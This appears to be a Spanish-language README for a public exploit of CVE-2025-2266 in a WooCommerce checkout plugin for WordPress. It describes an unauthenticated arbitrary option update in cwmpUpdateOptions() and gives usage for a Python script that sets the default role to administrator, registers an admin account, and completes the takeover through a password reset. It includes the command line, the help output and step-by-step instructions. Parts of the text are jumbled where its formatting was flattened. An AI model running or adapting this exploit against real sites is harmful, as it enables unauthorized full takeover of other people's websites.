
Checkout Mestres do WP para WooCommerce 8.6.5 - 8.7.5 - Actualización arbitraria de opciones no autenticada
El plugin Checkout Mestres do WP for WooCommerce para WordPress está afectado por una vulnerabilidad de actualización de opciones arbitrarias sin autenticación en las versiones 8.6.5 hasta 8.7.5.
La función vulnerable cwmpUpdateOptions() carece de las comprobaciones de capacidad adecuadas, permitiendo a atacantes no autenticados actualizar opciones arbitrarias de WordPress.
Un atacante puede:
administratorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HEste script Python explota la vulnerabilidad para:
administrator como rol predeterminadorequests (instalar mediante pip install requests)8.6.5 – 8.7.5)El script verifica la versión del plugin mediante:
/wp-content/plugins/checkout-mestres-wp/readme.txt
Si el plugin es vulnerable:
Registra un nuevo usuario (por defecto: nxploited) con privilegios de administrador
python CVE-2025-2266.py -u http://target.com/wordpress -newuser adminx -email [email protected]
| Opción | Descripción |
|---|---|
| , |
usage: CVE-2025-2266.py [-h] -u URL [-newuser [NEWUSER]] [-email [EMAIL]]
CVE-2025-2266 Checkout Mestres do WP for WooCommerce Plugin Exploit
By : Nxploited | Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress site URL (e.g., http://example.com/wordpress)
-newuser [NEWUSER] Create new admin user (default username: nxploited)
-email [EMAIL] Email for new user (default: [email protected])
Una vez creado el usuario:
Visita la página de inicio de sesión:
http://target.com/wordpress/wp-login.php
Haz clic en "¿Has perdido tu contraseña?"
[email protected])Establece una contraseña y obtén acceso completo como administrador 🎯
Exploit por Nxploited | Khaled Alenazi
⚠️ Este script es solo para fines educativos y de pruebas autorizadas.
-u--url| URL del sitio WordPress objetivo (Requerido) |
-newuser | Crear nuevo usuario administrador (nombre de usuario por defecto: nxploited) |
-email | Correo electrónico para el nuevo usuario (por defecto: [email protected]) |